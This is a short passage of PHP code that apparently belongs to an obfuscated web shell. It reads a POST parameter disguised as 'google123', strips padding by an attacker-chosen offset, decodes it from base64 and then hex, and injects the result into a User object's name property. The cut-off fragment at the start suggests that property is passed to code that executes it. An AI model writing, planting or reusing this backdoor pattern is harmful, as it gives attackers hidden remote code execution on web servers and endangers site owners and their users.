config."$this->name");}}$user=new User;$num=@$_POST['num'];$hex_data=base64_decode(substr(@$_POST['google123'],$num,-$num));$c=hex2bin($hex_data);$user->name=''.$c;?>